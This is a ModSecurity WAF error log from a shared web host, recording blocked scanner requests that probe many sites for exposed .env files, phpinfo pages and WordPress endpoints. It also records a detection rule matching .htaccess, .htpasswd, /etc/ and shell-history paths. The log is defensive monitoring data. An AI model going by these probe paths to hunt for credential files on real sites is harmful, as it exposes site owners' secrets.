[Tue May 26 15:04:53.576316 2026] [security2:error] [pid 678998:tid 679218] [client 153.75.250.148:53942] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.250.75.153.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "poonawallatennisacademy.moes-art.com"] [uri "/wp-content/themes/bootstrap-ultimate/docs/thanks.php"] [unique_id "ahVpPZ-Rl4i_pgT-iAdmGAAAAFo"]
[Tue May 26 15:04:53.770795 2026] [security2:error] [pid 678998:tid 679115] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/app/.env"] [unique_id "ahVpPZ-Rl4i_pgT-iAdmJQAAJnQ"]
[Tue May 26 15:04:53.839955 2026] [security2:error] [pid 678998:tid 679232] [client 74.249.173.207:4300] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.yourstorybag.com"] [uri "/as.php"] [unique_id "ahVpPZ-Rl4i_pgT-iAdmJgAAAGg"]
[Tue May 26 15:04:54.097072 2026] [security2:error] [pid 678998:tid 679250] [client 114.119.131.46:43643] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.kardashevtechnologies.com"] [uri "/about-us/"] [unique_id "ahVpPp-Rl4i_pgT-iAdmMwAAAHo"], referer: https://www.kardashevtechnologies.com/
[Tue May 26 15:04:55.247517 2026] [security2:error] [pid 678998:tid 679220] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpPp-Rl4i_pgT-iAdmUAAAAFw"]
[Tue May 26 15:04:55.540515 2026] [security2:error] [pid 678998:tid 679240] [client 136.243.220.209:53992] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.220.243.136.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahVpP5-Rl4i_pgT-iAdmZgAAAHA"]
[Tue May 26 15:04:55.544032 2026] [security2:error] [pid 678998:tid 679009] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/public/.env"] [unique_id "ahVpP5-Rl4i_pgT-iAdmZwAAMwo"]
[Tue May 26 15:04:56.432268 2026] [security2:error] [pid 678998:tid 679199] [client 209.163.117.195:1929] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahVpP5-Rl4i_pgT-iAdmeAAAAEc"], referer: https://anujtradingco.com
[Tue May 26 15:04:57.328292 2026] [security2:error] [pid 678998:tid 679012] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/portal/.env"] [unique_id "ahVpQZ-Rl4i_pgT-iAdmrQAAJQ0"]
[Tue May 26 15:04:57.534405 2026] [security2:error] [pid 678998:tid 679167] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpQZ-Rl4i_pgT-iAdmogAAACc"]
[Tue May 26 15:04:57.687548 2026] [security2:error] [pid 678998:tid 679155] [client 192.253.248.169:47336] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "208.91.198.65"] [uri "/.env"] [unique_id "ahVpQZ-Rl4i_pgT-iAdmvgAAABs"]
[Tue May 26 15:04:57.840042 2026] [security2:error] [pid 678998:tid 679141] [client 192.253.248.169:47336] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "208.91.198.65"] [uri "/api/.env"] [unique_id "ahVpQZ-Rl4i_pgT-iAdmwwAAAA0"]
[Tue May 26 15:04:57.993490 2026] [security2:error] [pid 678998:tid 679138] [client 192.253.248.169:47336] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "208.91.198.65"] [uri "/backend/.env"] [unique_id "ahVpQZ-Rl4i_pgT-iAdmzQAAAAo"]
[Tue May 26 15:04:58.217390 2026] [security2:error] [pid 678998:tid 679139] [client 192.253.248.169:47336] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 169.248.253.192.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.198.65"] [uri "/phpinfo.php"] [unique_id "ahVpQp-Rl4i_pgT-iAdmzgAAAAs"]
[Tue May 26 15:04:58.965542 2026] [security2:error] [pid 678998:tid 679242] [client 192.253.248.169:47352] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "208.91.198.65"] [uri "/laravel/.env"] [unique_id "ahVpQp-Rl4i_pgT-iAdm6wAAAHI"]
[Tue May 26 15:04:59.208969 2026] [security2:error] [pid 678998:tid 679018] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/application/.env"] [unique_id "ahVpQ5-Rl4i_pgT-iAdm-AAAQxM"]
[Tue May 26 15:04:59.414839 2026] [security2:error] [pid 678998:tid 679131] [client 192.253.248.169:47352] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "208.91.198.65"] [uri "/core/.env"] [unique_id "ahVpQ5-Rl4i_pgT-iAdnAgAAAAM"]
[Tue May 26 15:04:59.563957 2026] [security2:error] [pid 678998:tid 679210] [client 192.253.248.169:47352] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "208.91.198.65"] [uri "/app/.env"] [unique_id "ahVpQ5-Rl4i_pgT-iAdnBgAAAFI"]
[Tue May 26 15:04:59.648680 2026] [security2:error] [pid 678998:tid 679176] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpQ5-Rl4i_pgT-iAdm-QAAADA"]
[Tue May 26 15:04:59.862681 2026] [security2:error] [pid 678998:tid 679168] [client 192.253.248.169:47352] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "208.91.198.65"] [uri "/dev/.env"] [unique_id "ahVpQ5-Rl4i_pgT-iAdnEQAAACg"]
[Tue May 26 15:04:59.979725 2026] [security2:error] [pid 678998:tid 679252] [client 136.243.220.209:39704] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.220.243.136.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahVpQ5-Rl4i_pgT-iAdnFQAAAHw"]
[Tue May 26 15:05:00.312467 2026] [security2:error] [pid 678998:tid 679178] [client 192.253.248.169:47352] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "208.91.198.65"] [uri "/server/.env"] [unique_id "ahVpRJ-Rl4i_pgT-iAdnHgAAADI"]
[Tue May 26 15:05:00.764499 2026] [security2:error] [pid 678998:tid 679246] [client 192.253.248.169:47352] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "208.91.198.65"] [uri "/staging/.env"] [unique_id "ahVpRJ-Rl4i_pgT-iAdnLgAAAHY"]
[Tue May 26 15:05:00.912221 2026] [security2:error] [pid 678998:tid 679142] [client 192.253.248.169:47352] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 169.248.253.192.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.198.65"] [uri "/app_dev.php/_profiler/phpinfo"] [unique_id "ahVpRJ-Rl4i_pgT-iAdnNQAAAA4"]
[Tue May 26 15:05:01.055811 2026] [security2:error] [pid 678998:tid 679032] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/laravel/.env"] [unique_id "ahVpRZ-Rl4i_pgT-iAdnNgAAfiE"]
[Tue May 26 15:05:01.529400 2026] [security2:error] [pid 678998:tid 679215] [client 192.253.248.169:47360] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "208.91.198.65"] [uri "/demo/.env"] [unique_id "ahVpRZ-Rl4i_pgT-iAdnSgAAAFc"]
[Tue May 26 15:05:01.684212 2026] [security2:error] [pid 678998:tid 679168] [client 192.253.248.169:47360] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "208.91.198.65"] [uri "/portal/.env"] [unique_id "ahVpRZ-Rl4i_pgT-iAdnTgAAACg"]
[Tue May 26 15:05:01.714948 2026] [security2:error] [pid 678998:tid 679140] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpRZ-Rl4i_pgT-iAdnOwAAAAw"]
[Tue May 26 15:05:01.995184 2026] [security2:error] [pid 678998:tid 679220] [client 192.253.248.169:47360] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "208.91.198.65"] [uri "/crm/.env"] [unique_id "ahVpRZ-Rl4i_pgT-iAdnWgAAAFw"]
[Tue May 26 15:05:02.118912 2026] [security2:error] [pid 678998:tid 679192] [client 74.249.173.207:4302] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.yourstorybag.com"] [uri "/wp-trackback.php"] [unique_id "ahVpRp-Rl4i_pgT-iAdnYgAAAEA"]
[Tue May 26 15:05:02.149224 2026] [security2:error] [pid 678998:tid 679219] [client 192.253.248.169:47360] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "208.91.198.65"] [uri "/test/.env"] [unique_id "ahVpRp-Rl4i_pgT-iAdnZQAAAFs"]
[Tue May 26 15:05:02.303910 2026] [security2:error] [pid 678998:tid 679217] [client 192.253.248.169:47360] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "208.91.198.65"] [uri "/config/.env"] [unique_id "ahVpRp-Rl4i_pgT-iAdnaAAAAFk"]
[Tue May 26 15:05:02.458577 2026] [security2:error] [pid 678998:tid 679201] [client 192.253.248.169:47360] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "208.91.198.65"] [uri "/bot/.env"] [unique_id "ahVpRp-Rl4i_pgT-iAdndwAAAEk"]
[Tue May 26 15:05:02.612585 2026] [security2:error] [pid 678998:tid 679190] [client 192.253.248.169:47360] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 169.248.253.192.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.198.65"] [uri "/test.php"] [unique_id "ahVpRp-Rl4i_pgT-iAdneQAAAD4"]
[Tue May 26 15:05:02.619133 2026] [security2:error] [pid 678998:tid 679137] [client 43.173.181.179:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVpRp-Rl4i_pgT-iAdnZgAAAAk"]
[Tue May 26 15:05:03.181708 2026] [security2:error] [pid 678998:tid 679044] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/laravel/.env"] [unique_id "ahVpR5-Rl4i_pgT-iAdnkgAAeC0"]
[Tue May 26 15:05:03.224496 2026] [security2:error] [pid 678998:tid 679185] [client 192.253.248.169:47366] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "208.91.198.65"] [uri "/API/.env"] [unique_id "ahVpR5-Rl4i_pgT-iAdnkwAAADk"]
[Tue May 26 15:05:03.351662 2026] [security2:error] [pid 678998:tid 679198] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpRp-Rl4i_pgT-iAdnhAAAAEY"]
[Tue May 26 15:05:03.489120 2026] [security2:error] [pid 678998:tid 679222] [client 74.249.173.207:4441] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.yourstorybag.com"] [uri "/about.php"] [unique_id "ahVpR5-Rl4i_pgT-iAdnngAAAF4"]
[Tue May 26 15:05:03.584769 2026] [security2:error] [pid 678998:tid 679143] [client 136.243.220.209:64615] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.220.243.136.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahVpR5-Rl4i_pgT-iAdnpAAAAA8"]
[Tue May 26 15:05:05.069189 2026] [security2:error] [pid 678998:tid 679064] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/laravel/.env"] [unique_id "ahVpSZ-Rl4i_pgT-iAdnzQAAHkE"]
[Tue May 26 15:05:05.404415 2026] [security2:error] [pid 678998:tid 679191] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpSJ-Rl4i_pgT-iAdnzAAAAD8"]
[Tue May 26 15:05:07.434952 2026] [security2:error] [pid 678998:tid 679040] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/laravel/.env"] [unique_id "ahVpS5-Rl4i_pgT-iAdoJQAAVyk"]
[Tue May 26 15:05:07.861723 2026] [security2:error] [pid 678998:tid 679144] [client 136.243.220.209:57448] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.220.243.136.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahVpS5-Rl4i_pgT-iAdoNwAAABA"]
[Tue May 26 15:05:08.276728 2026] [security2:error] [pid 678998:tid 679174] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpS5-Rl4i_pgT-iAdoOAAAAC4"]
[Tue May 26 15:05:09.227895 2026] [security2:error] [pid 678998:tid 679061] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/backend/.env"] [unique_id "ahVpTZ-Rl4i_pgT-iAdoTwAAIj4"]
[Tue May 26 15:05:10.042856 2026] [security2:error] [pid 678998:tid 679198] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpTZ-Rl4i_pgT-iAdoXwAAAEY"]
[Tue May 26 15:05:10.308932 2026] [security2:error] [pid 678998:tid 679149] [client 74.249.173.207:5071] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.yourstorybag.com"] [uri "/file.php"] [unique_id "ahVpTp-Rl4i_pgT-iAdobAAAABU"]
[Tue May 26 15:05:10.947452 2026] [security2:error] [pid 678998:tid 679194] [client 142.147.108.204:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVpTp-Rl4i_pgT-iAdodgAAAEI"], referer: https://www.anujtradingco.com/
[Tue May 26 15:05:11.041669 2026] [security2:error] [pid 678998:tid 679052] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/admin/.env"] [unique_id "ahVpT5-Rl4i_pgT-iAdoegAAaTU"]
[Tue May 26 15:05:11.692010 2026] [security2:error] [pid 678998:tid 679199] [client 136.243.220.209:15065] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.220.243.136.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahVpT5-Rl4i_pgT-iAdojwAAAEc"]
[Tue May 26 15:05:12.141164 2026] [security2:error] [pid 678998:tid 679215] [client 142.147.108.204:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVpUJ-Rl4i_pgT-iAdonwAAAFc"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1244943&moderation-hash=9638e1b26cf6f7ba1053a7d653c10288
[Tue May 26 15:05:13.054770 2026] [security2:error] [pid 678998:tid 679062] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/core/.env"] [unique_id "ahVpUZ-Rl4i_pgT-iAdovgAAKz8"]
